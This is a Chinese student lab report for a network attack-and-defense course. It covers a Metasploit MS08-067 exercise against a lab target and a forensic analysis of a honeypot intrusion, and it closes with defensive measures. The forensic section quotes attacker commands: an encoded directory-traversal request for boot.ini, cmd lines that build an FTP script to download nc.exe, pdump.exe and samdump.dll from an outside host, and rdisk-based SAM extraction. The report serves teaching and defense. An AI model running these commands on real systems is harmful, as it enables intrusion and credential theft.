20251905 2025-2026-2 《网络攻防实践》实验六

20251905 2025-2026-2 《网络攻防实践》实践六报告

1.实践内容

Metasploit 框架的基本使用逻辑

Metasploit 是常见的渗透测试框架,集成了大量漏洞利用模块、Payload、辅助扫描模块和后渗透模块。本次实验中使用 Metasploit 完成 Windows 远程渗透,主要体现了以下使用逻辑:

首先,攻击者根据扫描结果判断目标可能存在的漏洞;然后在 Metasploit 中搜索并选择对应漏洞模块;接着配置目标 IP、目标端口、Payload、本机监听地址等参数;最后执行攻击模块,观察是否成功建立会话。

这一过程说明,Metasploit 的本质并不是自动“黑入”系统,而是将漏洞利用流程模块化。使用者仍然需要理解目标服务、漏洞条件、Payload 类型和网络连通性,否则容易出现攻击失败或无法建立连接的情况。

Payload 与反弹 Shell

Payload 是漏洞利用成功后真正执行的攻击载荷。本次实验中使用的是反弹 Shell 类型的 Payload。反弹 Shell 的特点是由受害主机主动连接攻击机,而不是攻击机直接连接受害主机。

这种方式在实际攻击中较常见,因为目标主机可能位于防火墙或 NAT 后面,外部主机不一定能够直接连接目标主机。但如果目标主机可以主动访问外部网络,反弹 Shell 就可能绕过一部分入站访问限制。

反弹 Shell 建立后,攻击者可以在攻击机上执行命令,并由目标主机返回执行结果。此时攻击者已经具备一定程度的远程控制能力,可以查看系统信息、目录结构、用户信息,甚至进一步尝试权限提升或下载其他工具。

目录穿越攻击

在取证分析部分,实验数据包中出现了访问 boot.ini 等系统文件的异常请求,这属于目录穿越攻击的典型表现。

目录穿越攻击的核心思想是利用 Web 应用或服务器对路径过滤不严的问题,通过构造包含 ../ 或特殊编码的路径,访问正常 Web 目录之外的敏感文件。攻击者一旦能够读取系统配置文件,就可能进一步判断系统类型、目录结构和潜在漏洞。

本次实验中出现的特殊编码路径说明,攻击者并不是正常访问网页资源,而是在尝试绕过路径限制,读取 Windows 系统中的敏感文件。这类行为在流量中通常表现为 URL 中存在大量异常路径符号、编码字符或系统文件名。

SQL 注入与远程命令执行

实验中的取证分析还涉及 SQL 注入攻击。SQL 注入是指攻击者将恶意 SQL 语句插入到 Web 请求参数中,使后端数据库执行非预期操作。在某些特定环境下,如果 Web 服务、数据库服务和系统权限配置不当,SQL 注入甚至可能进一步发展为系统命令执行。

本次实验中,根据流量中的特征字符串和命令执行痕迹,可以判断攻击者利用了与 msadcs.dll / RDS 相关的漏洞,通过构造恶意请求执行系统命令。攻击者并不是只查询数据库内容,而是借助漏洞让目标主机执行诸如创建 FTP 脚本、下载工具、启动远程 Shell 等操作。

这说明 SQL 注入的危害不仅限于数据泄露。在配置不安全的旧系统中,SQL 注入可能成为远程控制主机的入口。

Netcat 远程控制

Netcat,常被称为 nc,是一种网络工具,可以用于端口监听、端口连接、文件传输和建立 Shell。在攻击场景中,Netcat 常被用来建立远程命令行连接。

本次实验中,攻击者下载 nc.exe 后,通过特定端口建立远程 Shell。之后,攻击者可以在远程连接中执行 Windows 命令,例如查看用户、查看组信息、列目录、复制文件等。

从取证角度看,如果发现目标主机与外部 IP 之间存在异常端口的持续交互,并且 TCP 流中出现命令行输入和系统回显,就可以判断该连接很可能是远程 Shell 会话。

Windows 用户、组与权限探测

攻击者获得 Shell 后,通常会先判断当前权限和系统环境。本次实验中,攻击者执行了 net usersnet groupnet localgroupnet group domain admins 等命令。

这些命令的目的包括:

查看本机有哪些用户;
判断当前主机是否加入域;
查看本地组和域组信息;
寻找管理员账户或高权限用户;
判断是否存在进一步提权或横向移动的机会。

这说明攻击者进入系统后,并不会立即停止,而是会继续进行内部侦察。防守方在日志或流量中发现这类命令,也应当将其视为入侵后的权限探测行为。

SAM 文件与口令获取

SAM 文件是 Windows 系统中用于保存本地账户口令哈希的重要文件。攻击者如果能够获取 SAM 文件,并配合相关系统文件或工具,就可能离线破解本地账户密码。

本次实验中,攻击者尝试使用 pdump.exesamdump.dll 等工具获取口令信息,还尝试通过 rdisk /s- 生成系统修复信息,从而获得 SAM 文件的备份。这属于典型的凭据窃取行为。

这一部分说明,攻击者获得系统访问权限后,往往会进一步尝试获取账号密码。因为只获得一次 Shell 可能是不稳定的,而获取账号口令后,攻击者就可以通过远程登录、横向移动等方式扩大控制范围。

2.实践过程

(1)动手实践Metasploit windows attacker

任务:使用metasploit软件进行windows远程渗透统计实验

具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权

首先,nmap -sV 202.51.90.121查看目标靶机的开启的服务,是否具备攻击条件

image-20260420135725729

135端口开启,符合MS08-067漏洞攻击条件,遂打开msf控制台

image-20260420135934778

查找一下这个漏洞的利用

image-20260420131958736

选择用ms08_067漏洞

image-20260420132224533

设置payload为反弹shell

image-20260420132325410

看看有没有别的选项没有设置,rhost还没有

image-20260420132518470

设置一下rhost为远程ip

image-20260420140224873

执行后可以发现成功获取到了目标主机的访问权限

image-20260420140645674

(2)取证分析实践:解码一次成功的NT系统破解攻击。

来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么

首先打开提供的数据包文件

image-20260420151607372

这里可以看到GET请求头内容为/guest/default.asp/…%C0%AF…/…%C0%AF…/…%C0%AF…/boot.ini HTTP/1.1,这是攻击者利用目录穿越漏洞违规访问系统内未授权的文件。

image-20260427100710326

可以看到一句典型的SQL查询语句,而且内嵌了奇怪的命令,所以这是SQL注入攻击。根据特征字符串 ADM!ROX!YOUR!WORLD ,可以查询到是由msadc(2).pl渗透攻击工具发起的攻击。

image-20260422164508150

后续攻击者多次通过SQL注入进行命令执行,以下是几个例子:

832号包:cmd /c ftp -s sasfile

image-20260427104610822

888号包: cmd ./c echo haxedj00 >> sasfile

image-20260427104446865

从991号包开始,攻击者执行了如下命令:

image-20260427104049266

copy C:\winnt\system32\cmd.exe cmd1.exe
cmd1.exe /c open 213.116.251.162 >ftpcom
cmd1.exe /c echo johna2k >>ftpcom
cmd1.exe /c echo haxedj00 >>ftpcom
cmd1.exe /c echo get nc.exe >>ftpcom
cmd1.exe /c echo get pdump.exe >>ftpcom
cmd1.exe /c echo get samdump.dll >>ftpcom
cmd1.exe /c echo quit >>ftpcom

那么,筛选一下ftp协议吧

从1100号包开始,攻击者便登录了自己的FTP服务器,下载一些攻击工具

image-20260427111754062

image-20260427112114456

既然下载了nc工具,那nc便大概率是用来进行远程shell连接的。1224包的follow显示,远程shell监听的端口为6969

image-20260427123059570

用tcp.port==6969进行过滤后follow,便可以看到具体采用的攻击流程。关于攻击者获得系统访问权限后做了什么,以下是一些示例

image-20260427123258943

image-20260427123457012

image-20260427123527893

image-20260427123557179

image-20260427124012319

image-20260427123722458

image-20260427124054848

image-20260427123751726

image-20260427124111777

经过分析可知,攻击者首先使用net session,但是没有权限,然后执行net users,返回该主机的用户列表,尝试通过net group查看组用户、net localgroup查看本地组用户、 net group domain admins查看管理员组,但都失败了。接下来,攻击者试着执行pdump来破解出Administrator口令密文,但是还是失败。

image-20260427124151806

接着,攻击者试着用rdisk获得SAM口令文件,执行rdisk /s-备份关键系统信息,在/repair目录中就会创建一个名为sam._的SAM压缩拷贝。并且攻击者把这个文件拷贝到har.txt并打印

在4186包follow,可以看到在6968端口也建立了连接

image-20260427124330315

攻击者发现攻击目标是个蜜罐了。

image-20260427124550480

总结:

攻击者使用了什么破解工具进行攻击:

msadcs.dll 中存在的RDS漏洞进行SQL注入

samdump.dll、pdump.exe和nc.exe工具

攻击者如何使用这个破解工具进入并控制了系统

SQL注入与nc远程shell

攻击者获得系统访问权限后做了什么

查看目录,写下意味不明的语句,使用net session,执行net users,返回该主机的用户列表,尝试通过net group查看组用户、net localgroup查看本地组用户、 net group domain admins查看管理员组攻击者试着执行pdump来破解出Administrator口令密文,用rdisk获得SAM口令文件,执行rdisk /s-备份关键系统信息,在/repair目录中就会创建一个名为sam._的SAM压缩拷贝等

我们如何防止这样的攻击

安装MS01-026(Unicode)和MS99-025(RDS)补丁,或升级IIS至6.0+版本,从源头消除攻击入口

删除msadcs.dll文件并禁用RDS服务,阻止SQL注入命令执行

将IIS账户从Administrators组移除,配置专用低权限账户运行Web服务,防止攻击者获取系统级控制权

防火墙限制出站FTP连接(端口21),阻断攻击者下载nc.exe、pdump.exe等工具

部署IDS检测%C0%AF编码、rdisk -s命令及6969等异常端口连接,及时发现并响应攻击

你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么

攻击者写了

(3)团队对抗实践:windows系统远程渗透攻击和分析。

攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)

防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。

这里同样使用ms08_067漏洞得到20251902熊志东同学的主机的shell。好巧,他的ip是202.51.90.121

image-20260420135934778

image-20260420140224873

同样走一遍攻击流程,结果熊志东同学的主机是陷阱,他抓包察觉到了我的攻击:

image-20260420140334381

上面是漏洞的利用过程

下面是反弹shell的过程

image-20260420140418710

虽然我获取了访问权限,查看了他的ip地址

image-20260420151327306

image-20260420151013555

image-20260420140645674

但一举一动都在熊志东同学抓包的监视之下,畏惧了

image-20260420140733614

接下来我尝试在熊志东同学的电脑上留下黑调的低客究竟有多恐怖这么一句话来证明韩和安到此一游

image-20260420150937899

也是让他看到了

image-20260420150923759

但嘉豪行为的过程也被他看到了

image-20260420151000389

3.学习中遇到的问题及解决

- 问题1:帮熊志东同学完成实验时,msf漏洞利用总是不成功
- 问题1解决方案:排查后发现payload设置不符合靶机的版本,调整payload后成功

4.实践总结

通过本次实验,我对 Windows 系统远程渗透攻击和网络取证分析有了更加直观的认识。以前对漏洞利用的理解更多停留在原理层面,而通过 Metasploit 实际操作后,可以清楚看到从信息收集、模块选择、参数配置到获取 Shell 的完整攻击流程。同时,在 Wireshark 取证分析过程中,我认识到一次成功攻击往往会在网络流量中留下大量痕迹,例如异常请求、命令执行记录、FTP 文件传输和反弹 Shell 连接等。只要能够正确筛选和跟踪数据包,就可以逐步还原攻击者的行为。

这次实验也让我意识到,系统补丁、权限控制、服务最小化和网络监控在安全防护中非常重要。许多攻击并不是一步完成的,而是由漏洞利用、工具下载、权限探测和后续控制等多个环节组成,因此防守方也需要从多个层面进行检测和阻断。团队对抗部分让我进一步体会到,攻击行为即使成功,也可能被防守方通过抓包发现,所以在真实环境中,及时监测异常流量、分析日志并限制高危端口和服务,是降低入侵风险的重要手段。总体来说,本次实验提升了我对漏洞利用过程、攻击流量特征和入侵防御方法的综合理解。

posted @ 2026-04-27 13:24  安和_零樂  阅读(18)  评论(0)    收藏  举报